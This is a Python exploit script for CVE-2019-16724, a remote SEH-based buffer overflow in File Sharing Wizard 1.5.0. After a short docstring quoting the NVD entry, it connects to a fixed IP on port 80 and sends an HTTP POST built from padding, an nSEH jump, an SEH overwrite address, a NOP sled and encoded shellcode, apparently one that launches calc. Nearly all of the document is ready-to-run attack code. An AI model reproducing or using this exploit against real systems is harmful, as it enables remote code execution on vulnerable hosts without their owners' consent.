''' Exploit for CVE-2019-16724
Current Description

File Sharing Wizard 1.5.0 allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow 
in an HTTP POST parameter, a similar issue to CVE-2010-2330 and CVE-2010-2331.

Reference : https://nvd.nist.gov/vuln/detail/CVE-2019-16724
'''

import socket
import struct
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.2.15", 80))

nseh = "\xeb\x50\x90\x90"
seh = struct.pack("<I", 0x7C363BA3)

shellcode_calc =  b""
shellcode_calc += b"\xba\xf9\x1f\x83\xfa\xd9\xc9\xd9\x74\x24"
shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31"
shellcode_calc += b"\x57\x0f\x03\x57\xf6\xfd\x76\x06\xe0\x80"
shellcode_calc += b"\x79\xf7\xf0\xe4\xf0\x12\xc1\x24\x66\x56"
shellcode_calc += b"\x71\x95\xec\x3a\x7d\x5e\xa0\xae\xf6\x12"
shellcode_calc += b"\x6d\xc0\xbf\x99\x4b\xef\x40\xb1\xa8\x6e"
shellcode_calc += b"\xc2\xc8\xfc\x50\xfb\x02\xf1\x91\x3c\x7e"
shellcode_calc += b"\xf8\xc0\x95\xf4\xaf\xf4\x92\x41\x6c\x7e"
shellcode_calc += b"\xe8\x44\xf4\x63\xb8\x67\xd5\x35\xb3\x31"
shellcode_calc += b"\xf5\xb4\x10\x4a\xbc\xae\x75\x77\x76\x44"
shellcode_calc += b"\x4d\x03\x89\x8c\x9c\xec\x26\xf1\x11\x1f"
shellcode_calc += b"\x36\x35\x95\xc0\x4d\x4f\xe6\x7d\x56\x94"
shellcode_calc += b"\x95\x59\xd3\x0f\x3d\x29\x43\xf4\xbc\xfe"
shellcode_calc += b"\x12\x7f\xb2\x4b\x50\x27\xd6\x4a\xb5\x53"
shellcode_calc += b"\xe2\xc7\x38\xb4\x63\x93\x1e\x10\x28\x47"
shellcode_calc += b"\x3e\x01\x94\x26\x3f\x51\x77\x96\xe5\x19"
shellcode_calc += b"\x95\xc3\x97\x43\xf3\x12\x25\xfe\xb1\x15"
shellcode_calc += b"\x35\x01\xe5\x7d\x04\x8a\x6a\xf9\x99\x59"
shellcode_calc += b"\xcf\xe5\x7b\x48\x25\x8e\x25\x19\x84\xd3"
shellcode_calc += b"\xd5\xf7\xca\xed\x55\xf2\xb2\x09\x45\x77"
shellcode_calc += b"\xb7\x56\xc1\x6b\xc5\xc7\xa4\x8b\x7a\xe7"
shellcode_calc += b"\xec\xef\x1d\x7b\x6c\xde\xb8\xfb\x17\x1e"

buf = "POST "
buf += "\x41"*1040
buf += nseh
buf += seh
buf += "\x90"*100
buf += shellcode_calc
buf += "\x90"*(5000-len(buf))
buf += " HTTP/1.0\r\n\r\n"

s.send(buf)
s.close()